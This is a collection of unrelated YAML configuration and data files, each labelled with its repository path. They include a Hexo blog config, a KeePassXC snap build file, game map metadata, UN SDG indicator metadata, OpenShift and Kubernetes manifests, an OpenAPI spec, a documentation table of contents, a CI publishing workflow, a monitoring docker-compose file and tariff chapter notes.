permalink: posts/:abbrlink/
permalink_defaults:
pretty_urls:
trailing_index: false # Set to false to remove trailing 'index.html' from permalinks
trailing_html: false # Set to false to remove trailing '.html' from permalinks
# Directory
source_dir: source
public_dir: public
tag_dir: tags
archive_dir: archives
category_dir: categories
code_dir: downloads/code
i18n_dir: :lang
skip_render: README.md
# Writing
new_post_name: :title.md # File name of new posts
default_layout: post
titlecase: false # Transform title into titlecase
external_link:
enable: true # Open external links in new tab
field: site # Applies to the whole site or post only
exclude: '' # Exclude hostname. Specify subdomain when applicable, including www
filename_case: 0
render_drafts: false
post_asset_folder: false
relative_link: false
future: true
highlight:
enable: true
line_number: true
auto_detect: false
tab_replace: ' '
wrap: true
hljs: false
# Home page setting
# path: Root path for your blogs index page. (default = '')
# per_page: Posts displayed per page. (0 = disable pagination)
# order_by: Posts order. (Order by date descending by default)
index_generator:
path: ''
per_page: 10
order_by: -date
# Category & Tag
default_category: uncategorized
category_map:
tag_map:
# Metadata elements
## https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
meta_generator: true
# Date / Time format
## Hexo uses Moment.js to parse and display date
## You can customize the date format as defined in
## http://momentjs.com/docs/#/displaying/format/
date_format: YYYY-MM-DD
time_format: HH:mm:ss
## Use post's date for updated date unless set in front-matter
use_date_for_updated: false
# Pagination
## Set per_page to 0 to disable pagination
per_page: 10
pagination_dir: page
# Include / Exclude file(s)
## include:/exclude: options only apply to the 'source/' folder
include:
exclude:
ignore:
# Extensions
## Plugins: https://hexo.io/plugins/
## Themes: https://hexo.io/themes/
theme: next
# WordCounter
## Source: https://github.com/theme-next/hexo-symbols-count-time
symbols_count_time:
symbols: true
time: true
total_symbols: true
total_time: false
exclude_codeblock: false
awl: 4
wpm: 275
# LocalSearch
## Source: https://github.com/theme-next/hexo-generator-searchdb
search:
path: search.xml
field: post
content: true
format: html
# Abbrlink
## Source: https://github.com/rozbo/hexo-abbrlink
abbrlink:
alg: crc16 #support crc16(default) and crc32
rep: dec #support dec(default) and hex
# Sitemap
## Source: https://github.com/hexojs/hexo-generator-sitemap
sitemap:
path: sitemap.xml
#template: ./sitemap_template.xml
rel: false
# Baidu sitemap
## Source: https://github.com/coneycode/hexo-generator-baidu-sitemap
baidusitemap:
path: baidusitemap.xml
# Deployment
## Docs: https://hexo.io/docs/deployment.html
## Source: https://github.com/hexojs/hexo-deployer-git
deploy:
type: git
repo:
github: <EMAIL>:hujinbo/hujinbo.github.io.git,master
|
_config.yml
|
name: keepassxc
version: 2.6.0
grade: stable
summary: Community-driven port of the Windows application “KeePass Password Safe”
description: |
KeePassXC is an application for people with extremely high demands on secure
personal data management. It has a light interface, is cross-platform and
published under the terms of the GNU General Public License.
confinement: strict
base: core18
plugs: # plugs for theming, font settings, cursor and to use gtk3 file chooser
gtk-3-themes:
interface: content
target: $SNAP/data-dir/themes
default-provider: gtk-common-themes:gtk-3-themes
icon-themes:
interface: content
target: $SNAP/data-dir/icons
default-provider: gtk-common-themes:icon-themes
sound-themes:
interface: content
target: $SNAP/data-dir/sounds
default-provider: gtk-common-themes:sounds-themes
apps:
keepassxc:
adapter: full
command: usr/bin/keepassxc -style fusion
command-chain:
- bin/desktop-launch
- bin/gtk3-env-launch
plugs: [unity7, x11, opengl, gsettings, home, network, network-bind, removable-media, raw-usb, wayland, desktop-legacy, desktop]
desktop: usr/share/applications/org.keepassxc.KeePassXC.desktop
environment:
DISABLE_WAYLAND: 1
cli:
command: keepassxc-cli
plugs: [x11, gsettings, home, removable-media, raw-usb]
proxy:
command: keepassxc-proxy
plugs: [home]
parts:
keepassxc:
source: .
plugin: cmake
configflags:
- -DCMAKE_BUILD_TYPE=Release
- -DCMAKE_INSTALL_PREFIX=/usr
- -DKEEPASSXC_DIST_TYPE=Snap
- -DKEEPASSXC_BUILD_TYPE=Release
- -DWITH_TESTS=OFF
- -DWITH_XC_ALL=ON
- -DWITH_XC_KEESHARE_SECURE=ON
build-packages:
- g++
- libgcrypt20-dev
- libqt5x11extras5-dev
- libqt5svg5-dev
- qtbase5-dev
- qtbase5-private-dev
- qttools5-dev
- qttools5-dev-tools
- zlib1g-dev
- libxi-dev
- libxtst-dev
- libyubikey-dev
- libykpers-1-dev
- libsodium-dev
- libargon2-0-dev
- libqrencode-dev
- libquazip5-dev
- asciidoctor
stage-packages:
- dbus
- qttranslations5-l10n # common translations
- libgcrypt20
- libykpers-1-1
- libargon2-0
- libsodium23
- libxtst6
- libqt5x11extras5
- libqt5svg5
- try: [libqrencode3, libqrencode4]
- libqt5concurrent5
- libquazip5-1
- libusb-1.0-0
- qtwayland5
- qt5-gtk-platformtheme # for theming, font settings, cursor and to use gtk3 file chooser
- libqrencode3
- xclip
override-build: |
snapcraftctl build
sed -i 's|Icon=keepassxc|Icon=${SNAP}/usr/share/icons/hicolor/256x256/apps/keepassxc.png|g' $SNAPCRAFT_PART_INSTALL/usr/share/applications/org.keepassxc.KeePassXC.desktop
organize:
usr/share/qt5/translations/*.qm: usr/share/keepassxc/translations/
stage:
- -opt
after: [desktop-qt5]
launchers: # custom launcher to set QT_QPA_PLATFORMTHEME=gtk3 correctly
source: snap/local/launchers
plugin: dump
organize:
'*': bin/
stage:
- -bin/README.*
desktop-qt5:
source: https://github.com/ubuntu/snapcraft-desktop-helpers.git
source-subdir: qt
plugin: make
make-parameters: ["FLAVOR=qt5"]
build-packages:
- qtbase5-dev
- dpkg-dev
stage-packages:
- libxkbcommon0
- ttf-ubuntu-font-family
- dmz-cursor-theme
- light-themes
- adwaita-icon-theme
- gnome-themes-standard
- shared-mime-info
- libqt5gui5
- libgdk-pixbuf2.0-0
- libgtk2.0-0
- libqt5svg5 # for loading icon themes which are svg
- try: [appmenu-qt5] # not available on core18
- locales-all
|
tests/fixtures/snapcrafts/keepassxc-88a0a8d35a.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-17 15:54"
game: "Unreal Tournament"
name: "CTF-BT+(NB)NoviceCrypt"
author: "<NAME>"
description: "None"
releaseDate: "2000-04"
attachments:
- type: "IMAGE"
name: "CTF-BT+(NB)NoviceCrypt_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/BunnyTrack/N/CTF-BT%2B(NB)NoviceCrypt_shot_1.png"
originalFilename: "ctf-bt+(nb)novicecrypt.zip"
hash: "a0fa48e29435ecc462004897ef71f07d8684bf24"
fileSize: 3721086
files:
- name: "Area51_Music.umx"
fileSize: 1807010
hash: "de81577bc86f254c5474f45210719ef631df00b9"
- name: "CTF-BT+(NB)NoviceCrypt.unr"
fileSize: 9609946
hash: "9e620a9a9d3ecfc5707aaa8127eac734caa6210f"
otherFiles: 0
dependencies:
CTF-BT+(NB)NoviceCrypt.unr:
- status: "OK"
name: "Area51_Music"
- status: "MISSING"
name: "i4Games_BTScripts_200510"
downloads:
- url: "http://www.ut-files.com/index.php?dir=Maps/BunnyTrack/CTF-BT/&file=ctf-bt%2B%28nb%29novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/BunnyTrack/N/ctf-bt%2B(nb)novicecrypt.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/BunnyTrack/&file=ctf-bt%2B%28nb%29novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/BunnyTrack&file=ctf-bt%2B%28nb%29novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/BunnyTrack/N/a/0/fa48e2/ctf-bt%252B(nb)novicecrypt.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/BunnyTrack/N/a/0/fa48e2/ctf-bt%252B(nb)novicecrypt.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "BunnyTrack"
title: "BT+ Novice Crypt"
playerCount: "6-12"
themes:
Skaarj Crypt: 0.7
Ancient: 0.1
Nali Castle: 0.1
bots: false
|
content/Unreal Tournament/Maps/BunnyTrack/N/a/0/fa48e2/ctf-btnbnovicecrypt_[a0fa48e2].yml
|
SDG_GOAL: >-
<p>Objetivo 17: Fortalecer los medios de implementación y revitalizar la Alianza
Mundial para el Desarrollo Sostenible</p>
SDG_TARGET: >-
<p>Meta 17.18: De aquí a 2020, mejorar el apoyo a la creación de capacidad prestado
a los países en desarrollo, incluidos los países menos adelantados y los pequeños
Estados insulares en desarrollo, para aumentar significativamente la disponibilidad
de datos oportunos, fiables y de gran calidad desglosados por ingresos, sexo, edad,
raza, origen étnico, estatus migratorio, discapacidad, ubicación geográfica y otras
características pertinentes en los contextos nacionales</p>
SDG_INDICATOR: >-
<p>Indicador 17.18.3: Número de países que cuentan con un plan estadístico nacional
plenamente financiado y en proceso de aplicación, desglosado por fuente de financiación</p>
META_LAST_UPDATE: '<p>Última actualización: 11 de julio de 2017</p>'
SDG_RELATED_INDICATORS: >-
<h1> Indicadores relacionados a febrero de 2020</h1>
<p>17.19.1: Valor en dólares de todos los recursos puestos a disposición para fortalecer
la capacidad estadística en los países en desarrollo</p>
SDG_CUSTODIAN_AGENCIES: |-
<h1> Información institucional</h1>
<h2> Organización(es) de organización(es):</h2>
<p> Consorcio de Estadísticas para el Desarrollo en el siglo XXI (PARIS21)</p>
STAT_CONC_DEF: >-
<h1>Conceptos y definiciones</h1>
<h2>Definición:</h2>
<p>El indicador Número de países con un plan estadístico nacional totalmente financiado
y en ejecución se basa en el Informe anual sobre la situación de las estrategias
nacionales para el desarrollo de las estadísticas (ENDE). En colaboración con sus
socios, PARIS21 informa sobre el progreso de los países en el diseño y la implementación
de los planes estadísticos nacionales. El indicador es un recuento de los países
que están (i) aplicando una estrategia, (ii) diseñando una o (iii) esperando la
adopción de la estrategia en el año en curso.</p>
SOURCE_TYPE: >-
<h1> Fuentes de datos</h1>
<h2> Descripción:</h2>
<p> Los datos son proporcionados por las Oficinas Nacionales de Estadística. La
información se recopila anualmente y se verifica por correspondencia directa por
correo electrónico con el centro de coordinación nacional para la ENDE del país
(Estrategia Nacional para el Desarrollo de las Estadísticas). </p>
<h2> Lista:</h2>
<p> Oficinas Nacionales de Estadística</p>
FREQ_COLL: |-
<h1>Calendario</h1>
<h2>Recolección de datos:</h2>
<p>Enero-17</p>
REL_CAL_POLICY: |-
<h2> Publicación de datos: </h2>
<p> 1 de febrero de 2017 </p>
DATA_SOURCE: |-
<h1>Proveedores de datos</h1>
<h2>Nombre:</h2>
<p>PARIS21</p>
COMPILING_ORG: |-
<h1>Recopiladores de datos</h1>
<p>PARIS21</p>
DATA_COMP: >-
<h1>Metodología</h1>
<h2>Método de cálculo:</h2>
<p>Recuento simple de los países que están (i) aplicando una estrategia, (ii) diseñando
una o (iii) esperando la adopción de la estrategia en el año en curso.</p>
REG_AGG: >-
<h2> Agregados regionales:</h2>
<p> Los agregados a nivel regional se basan en el recuento total de estrategias
nacionales. </p>
DOC_METHOD: >-
<h2>Métodos y directrices a disposición de los países para la recopilación de datos
a nivel nacional: </h2>
<p>Encuesta PARIS21 sobre los ODS a través del formulario en línea + Informe anual
sobre la situación de las ENDE de PARIS21 (<a href="http://www.paris21.org/nsds-status">http://www.paris21.org/nsds-status</a>)
</p>
<p>Directriz de la ENDE (<a href="http://nsdsguidelines.paris21.org/">http://nsdsguidelines.paris21.org/</a>)
</p>
QUALITY_ASSURE: >-
<h2>Garantía de calidad:</h2>
<p>Consulta con los países para comprobar la información disponible en línea</p>
COVERAGE: >-
<h1>Disponibilidad de datos</h1>
<h2>Descripción:</h2>
<p>La serie temporal actual para 2007-2015 abarca 121 países en desarrollo.</p>
<h2>Series temporales:</h2>
<p>De 2007 a 2015</p>
<h2>Desagregación:</h2>
<p>El indicador se puede desagregar por zonas geográficas.</p>
OTHER_DOC: >-
<h1> Referencias</h1>
<h2> URL:</h2>
<p> <a href="www.paris21.org">www.paris21.org</a> </p>
<h2> Referencias:</h2>
<p> PARIS21 (2016). Informe de situación de las ENDE. Disponible en <a href="http://www.paris21.org/nsds-status">http://www.paris21.org/nsds-status</a></p>
|
translations-metadata/es/17-18-3.yml
|
kind: Template
apiVersion: v1
metadata:
annotations:
description: The Gitea git server (https://gitea.io/en-US/)
tags: instant-app,gitea,datastore
iconClass: "icon-github"
name: gitea
objects:
- kind: ServiceAccount
apiVersion: v1
metadata:
creationTimestamp: null
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
- kind: Service
apiVersion: v1
metadata:
annotations:
description: The Gitea server's http port
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
spec:
ports:
- name: 3000-tcp
port: 3000
protocol: TCP
targetPort: 3000
selector:
app: ${APPLICATION_NAME}
deploymentconfig: ${APPLICATION_NAME}
sessionAffinity: None
type: ClusterIP
status:
loadBalancer: {}
- kind: Route
apiVersion: v1
id: ${APPLICATION_NAME}-http
metadata:
annotations:
description: Route for application's http service.
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
spec:
to:
name: ${APPLICATION_NAME}
- kind: DeploymentConfig
apiVersion: v1
metadata:
labels:
app: ${APPLICATION_NAME}
name: ${APPLICATION_NAME}
spec:
replicas: 1
selector:
app: ${APPLICATION_NAME}
deploymentconfig: ${APPLICATION_NAME}
strategy:
resources: {}
rollingParams:
intervalSeconds: 1
maxSurge: 25%
maxUnavailable: 25%
timeoutSeconds: 600
updatePeriodSeconds: 1
type: Rolling
template:
metadata:
creationTimestamp: null
labels:
app: ${APPLICATION_NAME}
deploymentconfig: ${APPLICATION_NAME}
spec:
serviceAccountName: ${APPLICATION_NAME}
containers:
- image: "${GITEA_IMAGE}:${GITEA_VERSION}"
imagePullPolicy: Always
name: ${APPLICATION_NAME}
ports:
- containerPort: 3000
protocol: TCP
resources: {}
terminationMessagePath: /dev/termination-log
volumeMounts:
- name: gitea-repositories
mountPath: /home/gitea/gitea-repositories
- name: gitea-config
mountPath: /home/gitea/conf
readinessProbe:
httpGet:
path: /
port: 3000
scheme: HTTP
initialDelaySeconds: 5
timeoutSeconds: 1
periodSeconds: 20
successThreshold: 1
failureThreshold: 3
livenessProbe:
httpGet:
path: /
port: 3000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 1
periodSeconds: 10
successThreshold: 1
failureThreshold: 3
dnsPolicy: ClusterFirst
restartPolicy: Always
securityContext: {}
terminationGracePeriodSeconds: 30
volumes:
- name: gitea-repositories
emptyDir: {}
- name: gitea-config
emptyDir: {}
test: false
triggers:
- type: ConfigChange
parameters:
- description: The name for the application.
name: APPLICATION_NAME
required: true
value: gitea
- name: GITEA_IMAGE
displayName: Gitea Image
description: The name and tag for the Gitea Image to use
value: "docker.io/wkulhanek/gitea"
required: true
- name: GITEA_VERSION
displayName: Gitea Image Version Tag
description: The tag for the Gitea Image to use
value: "latest"
required: true
|
gitea-template.yml
|
openapi: '3.0.3'
info:
version: 1.0.0
title: Stream Management API for OpenID Shared Security Events
description: |
[OpenID Spec](https://openid.net/specs/openid-sse-framework-1_0.html#management)
HTTP API to be implemented by Event Transmitters. This API can be used by
Event Receivers to query and update the Event Stream configuration and
status, to add and remove subjects, and to trigger verification.
license:
name: MIT
paths:
/.well-known/sse-configuration:
$ref: './paths/transmitter-configuration.yaml'
/.well-known/sse-configuration/{issuer}:
$ref: './paths/transmitter-configuration-with-issuer.yaml'
/stream:
$ref: './paths/stream-configuration.yaml'
/status:
$ref: './paths/status.yaml'
/add-subject:
$ref: './paths/add-subject.yaml'
/remove-subject:
$ref: './paths/remove-subject.yaml'
/verification:
$ref: './paths/verification.yaml'
/jwks.json:
$ref: './paths/jwks.yaml'
/poll:
$ref: './paths/poll.yaml'
/register:
$ref: './paths/register.yaml'
/trigger-event:
$ref: './paths/trigger-event.yaml'
components:
securitySchemes:
BearerAuth:
type: http
scheme: bearer
parameters:
issuer:
$ref: './parameters/path/issuer.yaml'
subject:
$ref: './parameters/query/subject.yaml'
schemas:
StreamStatus:
$ref: './schemas/StreamStatus.yaml'
TransmitterConfiguration:
$ref: './schemas/TransmitterConfiguration.yaml'
StreamConfiguration:
$ref: './schemas/StreamConfiguration.yaml'
UpdateStreamStatus:
$ref: './schemas/UpdateStreamStatus.yaml'
PollDeliveryMethod:
$ref: './schemas/PollDeliveryMethod.yaml'
PushDeliveryMethod:
$ref: './schemas/PushDeliveryMethod.yaml'
RegisterResponse:
$ref: './schemas/RegisterResponse.yaml'
TriggerEventParameters:
$ref: './schemas/TriggerEventParameters.yaml'
# Request Body params
AddSubjectParameters:
$ref: './schemas/AddSubjectParameters.yaml'
PollParameters:
$ref: './schemas/PollParameters.yaml'
RegisterParameters:
$ref: './schemas/RegisterParameters.yaml'
RemoveSubjectParameters:
$ref: './schemas/RemoveSubjectParameters.yaml'
VerificationParameters:
$ref: './schemas/VerificationParameters.yaml'
# Simple Subjects
Account:
$ref: './schemas/subject/Account.yaml'
DID:
$ref: './schemas/subject/DID.yaml'
Email:
$ref: './schemas/subject/Email.yaml'
IssSub:
$ref: './schemas/subject/IssSub.yaml'
JwtID:
$ref: './schemas/subject/JwtID.yaml'
Opaque:
$ref: './schemas/subject/Opaque.yaml'
PhoneNumber:
$ref: './schemas/subject/PhoneNumber.yaml'
SamlAssertionID:
$ref: './schemas/subject/SamlAssertionID.yaml'
# Nested Subjects
SimpleSubject:
$ref: './schemas/subject/SimpleSubject.yaml'
Aliases:
$ref: './schemas/subject/Aliases.yaml'
ComplexSubject:
$ref: './schemas/subject/ComplexSubject.yaml'
# Subject
Subject:
$ref: './schemas/subject/Subject.yaml'
# Errors
Error:
$ref: './schemas/Error.yaml'
responses:
BadRequest:
# 400
description: Request body cannot be parsed or the request is otherwise invalid
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
Unauthorized:
# 401
description: Authorization failed or is missing
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
Forbidden:
# 403
description: User not authorized to access resource
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
NotFound:
# 404
description: Resource not found
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
TooManyRequests:
# 429
description: Event Receiver is sending too many requests
content:
application/json:
schema:
$ref: '#/components/schemas/Error'
tags:
- name: StreamManagement
description: |-
[Spec](https://openid.net/specs/openid-sse-framework-1_0.html#management)
Stream Management endpoints provided by an Event Transmitter so that Event Transmitters may configure Event Streams.
- name: Transmitter
description: |-
Additional endpoints provided by an Event Transmitter. These are not needed during Stream Managment, but are used
by Event Receivers for event processing.
- name: OutOfBand
description: |-
Endpoints that are NOT a part of the [Open ID Spec](https://openid.net/specs/openid-sse-framework-1_0.html), but
that exist for convenience within this demo.
|
transmitter_spec/openapi.yaml
|
- name: Windows Virtual Desktop (clássico)
href: ../index.yml
- name: Descrição geral
items:
- name: O que é o Windows Virtual Desktop?
href: ../overview.md
- name: Documentação do Windows Virtual Desktop
href: ../create-host-pools-azure-marketplace.md
- name: Tutoriais
items:
- name: 1. Criar um inquilino
href: tenant-setup-azure-active-directory.md
- name: 2. Criar principais de serviço e atribuições de funções com o PowerShell
href: create-service-principal-role-powershell.md
- name: 3. Criar um conjunto de anfitriões com o Azure Marketplace
href: create-host-pools-azure-marketplace-2019.md
- name: 4. Gerir grupos de aplicações
href: manage-app-groups-2019.md
- name: 5. Criar um conjunto de anfitriões para validar as atualizações de serviço
href: create-validation-host-pool-2019.md
- name: 6. Configurar alertas de serviço
href: set-up-service-alerts-2019.md
- name: Procedimentos
items:
- name: Migrar manualmente
href: ../manual-migration.md
- name: Ligar a recursos do Windows Virtual Desktop
items:
- name: Ligar ao cliente de Ambiente de Trabalho do Windows
href: connect-windows-7-10-2019.md
- name: Ligar com o cliente web
href: connect-web-2019.md
- name: Ligar ao cliente Android
href: connect-android-2019.md
- name: Ligar ao cliente de macOS
href: connect-macos-2019.md
- name: Ligar ao cliente de iOS
href: connect-ios-2019.md
- name: Criar um conjunto de anfitriões e anfitriões de sessões
items:
- name: Modelo Azure Resource Manager
href: create-host-pools-arm-template.md
- name: PowerShell
href: create-host-pools-powershell-2019.md
- name: Implementar uma máquina virtual do Windows 7
href: deploy-windows-7-virtual-machine.md
- name: Implementar um anfitrião de sessões baseado em GPU
href: configure-vm-gpu-2019.md
- name: Expandir um conjunto de anfitriões existente
href: expand-existing-host-pool-2019.md
- name: Configurar as definições do conjunto de anfitriões
items:
- name: Propriedades de RDP
href: customize-rdp-properties-2019.md
- name: Tipo de atribuição de ambiente de trabalho pessoal
href: configure-host-pool-personal-desktop-assignment-type-2019.md
- name: Dimensionar automaticamente os anfitriões de sessão
href: set-up-scaling-script.md
- name: Personalizar o feed
href: customize-feed-virtual-desktop-users-2019.md
- name: Implementar a ferramenta de gestão
items:
- name: Modelo Azure Resource Manager
href: manage-resources-using-ui.md
- name: PowerShell
href: manage-resources-using-ui-powershell.md
- name: Utilizar o diagnóstico do serviço
items:
- name: Implementar a ferramenta de diagnóstico
href: deploy-diagnostics.md
- name: Utilizar o diagnóstico com o Log Analytics
href: diagnostics-log-analytics-2019.md
- name: Publicar aplicações incorporadas
href: publish-apps-2019.md
- name: Configurar o Multi-Factor Authentication do Azure AD
href: ../set-up-mfa.md
- name: Conceitos
items:
- name: Ambiente do Windows Virtual Desktop
href: environment-setup-2019.md
- name: Acesso delegado ao Windows Virtual Desktop
href: delegated-access-virtual-desktop-2019.md
- name: Métodos de balanceamento de carga do agrupamento de anfitriões
href: host-pool-load-balancing-2019.md
- name: Localizações dos dados
href: data-locations-2019.md
- name: Resolução de problemas
items:
- name: 'Descrição geral da resolução de problemas, comentários e suporte'
href: troubleshoot-set-up-overview-2019.md
- name: Identificar e diagnosticar problemas
href: diagnostics-role-service-2019.md
- name: Criação de inquilinos e conjuntos de anfitriões
href: troubleshoot-set-up-issues-2019.md
- name: Configuração da máquina virtual do anfitrião da sessão
href: troubleshoot-vm-configuration-2019.md
- name: Resolver problemas de máquinas virtuais do Windows 7
href: troubleshoot-windows-7-vm.md
- name: Resolver problemas da ferramenta de gestão
href: troubleshoot-management-tool.md
- name: Ligações do serviço de Ambiente de Trabalho Remoto
href: troubleshoot-service-connection-2019.md
- name: Windows Virtual Desktop PowerShell
href: troubleshoot-powershell-2019.md
- name: Referência
items:
- name: PowerShell
href: /powershell/windows-virtual-desktop/overview
- name: API REST
href: /rest/api/virtual-desktop/
|
articles/virtual-desktop/virtual-desktop-fall-2019/TOC.yml
|
name: Dev branch publishing
on:
push:
branches:
- dev
jobs:
dev_branch_publishing:
runs-on: ubuntu-latest
environment: npm-publish
if: github.repository == 'romcal/romcal' && !startsWith(github.event.head_commit.message, 'ci:')
env:
CI: true
GITHUB_USER: github-actions
GITHUB_EMAIL: <EMAIL>
steps:
- name: Git checkout dev branch
uses: actions/checkout@v2
with:
ref: dev
token: ${{ secrets.REPO_TOKEN }}
- name: Install node.js and npm
uses: volta-cli/action@v1
- name: Automated version bump
uses: phips28/gh-action-bump-version@master
with:
major-wording: 'MajorBump'
minor-wording: 'MinorBump'
patch-wording: 'PatchBump'
rc-wording:
default: prerelease
preid: dev
skip-commit: 'true'
skip-tag: 'true'
- name: Read package.json
uses: culshaw/read-package-node-version-actions@v1
id: package
- name: Display bumped version
run: 'echo "New romcal version: ${{ steps.package.outputs.version }}"'
- name: Install npm dependencies
run: npm ci --no-audit
- name: Update browsers list (caniuse)
run: npx browserslist@latest --update-db
- name: Build romcal project (romcal + all calendar bundles)
run: npm run build
- name: Run tests
run: npm run test:without-coverage
- name: Commit and tag the updated version
run: |
git config user.name ${{ env.GITHUB_USER }}
git config user.email ${{ env.GITHUB_EMAIL }}
git add .
git commit -m "ci: bump version to ${{ steps.package.outputs.version }}"
git push
git tag v${{ steps.package.outputs.version }}
git push --tags
- name: Npm publish a new 'dev' version (romcal + all calendar bundles)
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
run: node -r ts-node/register scripts/publish.ts
|
.github/workflows/dev-publishing.yml
|
version: '2'
services:
zookeeper:
image: wurstmeister/zookeeper
ports:
- 2181:2181
volumes:
- ./volume/zookeeper/:/var/run/docker.sock
kafka:
image: wurstmeister/kafka
links:
- zookeeper
ports:
- 9092:9092
- 9999:9999
environment:
KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
KAFKA_LISTENERS: OUTSIDE://:9092,INSIDE://:9192
KAFKA_ADVERTISED_LISTENERS: OUTSIDE://127.0.0.1:9092,INSIDE://kafka:9192
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: OUTSIDE:PLAINTEXT,INSIDE:PLAINTEXT
KAFKA_INTER_BROKER_LISTENER_NAME: INSIDE
KAFKA_DELETE_TOPIC_ENABLE: "true"
KAFKA_NUM_PARTITIONS: 3
KAFKA_DEFAULT_REPLICATION_FACTOR: 1
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
KAFKA_JMX_OPTS: -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.port=9999
KAFKA_JMX_PORT: 9999
volumes:
- ./volume/kafka/:/var/run/docker.sock
zabbix-db:
image: mysql:5.7
environment:
- MYSQL_DATABASE=${DB_NAME}
- MYSQL_USER=${DB_USER}
- MYSQL_PASSWORD=${DB_USER_PASSWORD}
- MYSQL_ROOT_PASSWORD=${DB_ROOT_PASSWORD}
zabbix-server:
image: zabbix/zabbix-server-mysql:${OS}-${VERSION}
environment:
- DB_SERVER_HOST=zabbix-db
- MYSQL_DATABASE=${DB_NAME}
- MYSQL_USER=${DB_USER}
- MYSQL_PASSWORD=${<PASSWORD>}
- MYSQL_ROOT_PASSWORD=${<PASSWORD>}
- ZBX_DEBUGLEVEL=${LOG_LEVEL}
- ZBX_JAVAGATEWAY_ENABLE=true
- ZBX_JAVAGATEWAY=zabbix-java-gw
- ZBX_JAVAGATEWAYPORT=10052
- ZBX_STARTJAVAPOLLERS=5
ports:
- 10051:10051
zabbix-web:
image: zabbix/zabbix-web-apache-mysql:${OS}-${VERSION}
links:
- zabbix-server
- zabbix-db
environment:
- ZBX_SERVER_HOST=zabbix-server
- DB_SERVER_HOST=zabbix-db
- MYSQL_DATABASE=${DB_NAME}
- MYSQL_USER=${DB_USER}
- MYSQL_PASSWORD=${<PASSWORD>}
- MYSQL_ROOT_PASSWORD=${<PASSWORD>}
- PHP_TZ=${TIME_ZONE}
ports:
- ${HTTP_PORT}:80
zabbix-java-gw:
image: zabbix/zabbix-java-gateway:${OS}-${VERSION}
privileged: true
environment:
- ZBX_SERVER_HOST=zabbix-server
expose:
- 10052
links:
- zabbix-server
grafana:
image: grafana/grafana
links:
- zabbix-server
ports:
- 3000:3000
environment:
GF_INSTALL_PLUGINS: alexanderzobnin-zabbix-app
|
docker-compose.yml
|
---
:section: 11
:chapter: 56
:content: "* 1\\. This chapter does not cover:\r\n * (a) wadding, felt or nonwovens,
impregnated, coated or covered with substances or preparations (for example, perfumes
or cosmetics of Chapter 33, soaps or detergents of heading 3401, polishes, creams
or similar preparations of heading 3405, fabric softeners of heading 3809), where
the textile material is present merely as a carrying medium;\r\n * (b) textile
products of heading 5811;\r\n * (c) natural or artificial abrasive powder or grain,
on a backing of felt or nonwovens (heading 6805);\r\n * (d) agglomerated or reconstituted
mica, on a backing of felt or nonwovens (heading 6814);\r\n * (e) metal foil on
a backing of felt or nonwovens (generally Section XIV or Section XV); or\r\n *
(f) sanitary towels (pads) and tampons, napkins (diapers) and napkin liners for
babies, and similar articles, of heading 9619.\r\n* 2\\. The term 'felt' includes
needleloom felt and fabrics consisting of a web of textile fibres the cohesion of
which has been enhanced by a stitch-bonding process using fibres from the web itself.\r\n*
3\\. Headings 5602 and 5603 cover, respectively, felt and nonwovens, impregnated,
coated, covered or laminated with plastics or rubber whatever the nature of these
materials (compact or cellular).\r\n* Heading 5603 also includes nonwovens in which
plastics or rubber forms the bonding substance.\r\n* Headings 5602 and 5603 do not,
however, cover:\r\n * (a) felt impregnated, coated, covered or laminated with plastics
or rubber, containing 50% or less by weight of textile material or felt completely
embedded in plastics or rubber (Chapter 39 or 40);\r\n * (b) nonwovens, either
completely embedded in plastics or rubber, or entirely coated or covered on both
sides with such materials, provided that such coating or covering can be seen with
the naked eye with no account being taken of any resulting change of colour (Chapter
39 or 40); or\r\n * (c) plates, sheets or strips of cellular plastics or cellular
rubber combined with felt or nonwovens, where the textile material is present merely
for reinforcing purposes (Chapter 39 or 40).\r\n* 4\\. Heading 5604 does not cover
textile yarn, or strip or the like of heading 5404 or 5405, in which the impregnation,
coating or covering cannot be seen with the naked eye (usually Chapters 50 to 55);
for the purpose of this provision, no account should be taken of any resulting change
of colour."
|
db/notes/chapters/11_56.yaml
|
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: metrics-server
name: metrics-server
namespace: default
spec:
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: metrics-server
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
labels:
app: metrics-server
spec:
containers:
- envFrom:
- configMapRef:
name: cluster-config
env:
- name: JAVA_OPTS
value: "-Xms64m"
- name: cassandra_contactPoints
valueFrom:
configMapKeyRef:
key: CASSANDRA_CONTACTPOINTS
name: arcus-config
- name: cassandra_history_contactPoints
valueFrom:
configMapKeyRef:
key: CASSANDRA_CONTACTPOINTS
name: arcus-config
- name: CASSANDRA_KEYSPACE
valueFrom:
configMapKeyRef:
key: CASSANDRA_KEYSPACE
name: arcus-config
- name: BOOTSTRAP_SERVERS
valueFrom:
configMapKeyRef:
key: BOOTSTRAP_SERVERS
name: arcus-config
